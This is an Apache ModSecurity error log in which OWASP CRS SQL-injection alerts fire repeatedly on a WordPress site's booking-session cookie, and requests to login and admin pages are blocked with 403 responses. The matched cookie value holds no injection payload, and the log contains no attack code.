[Mon May 11 22:26:29.858690 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7dXo_DFxNSZVmaX3QBAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:29.858951 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7dXo_DFxNSZVmaX3QBAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:30.418885 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7dXo_DFxNSZVmaX3QBAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:31.245308 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7d3o_DFxNSZVmaX3QDwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:31.245581 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7d3o_DFxNSZVmaX3QDwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:31.797606 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7d3o_DFxNSZVmaX3QDwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:32.458599 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7eHo_DFxNSZVmaX3QMAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:32.458863 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7eHo_DFxNSZVmaX3QMAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:32.816178 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7eHo_DFxNSZVmaX3QMAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:33.446147 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7eXo_DFxNSZVmaX3QRAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:33.446454 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7eXo_DFxNSZVmaX3QRAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:34.062143 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7eXo_DFxNSZVmaX3QRAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:35.131822 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7e3o_DFxNSZVmaX3QRQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:35.132109 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7e3o_DFxNSZVmaX3QRQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:35.721875 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7e3o_DFxNSZVmaX3QRQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:35.929785 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7e3o_DFxNSZVmaX3QRwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:35.930057 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7e3o_DFxNSZVmaX3QRwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:36.538462 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7e3o_DFxNSZVmaX3QRwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:36.731060 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7fHo_DFxNSZVmaX3QSAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:36.731350 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7fHo_DFxNSZVmaX3QSAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:37.265830 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7fHo_DFxNSZVmaX3QSAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:37.540556 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7fXo_DFxNSZVmaX3QSgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:37.540829 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7fXo_DFxNSZVmaX3QSgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:38.107358 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7fXo_DFxNSZVmaX3QSgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:39.136341 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7f3o_DFxNSZVmaX3QTAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:39.136654 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7f3o_DFxNSZVmaX3QTAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:39.514633 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7f3o_DFxNSZVmaX3QTAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:39.931926 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7f3o_DFxNSZVmaX3QTgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:39.932343 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7f3o_DFxNSZVmaX3QTgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:40.560453 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7f3o_DFxNSZVmaX3QTgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:40.945928 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7gHo_DFxNSZVmaX3QTwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:40.946260 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7gHo_DFxNSZVmaX3QTwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:41.538040 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7gHo_DFxNSZVmaX3QTwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:42.639733 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7gno_DFxNSZVmaX3QUgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:42.640015 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7gno_DFxNSZVmaX3QUgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:43.277397 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7gno_DFxNSZVmaX3QUgAAANA"], referer: https://rentparadise.fr/wp-login.php
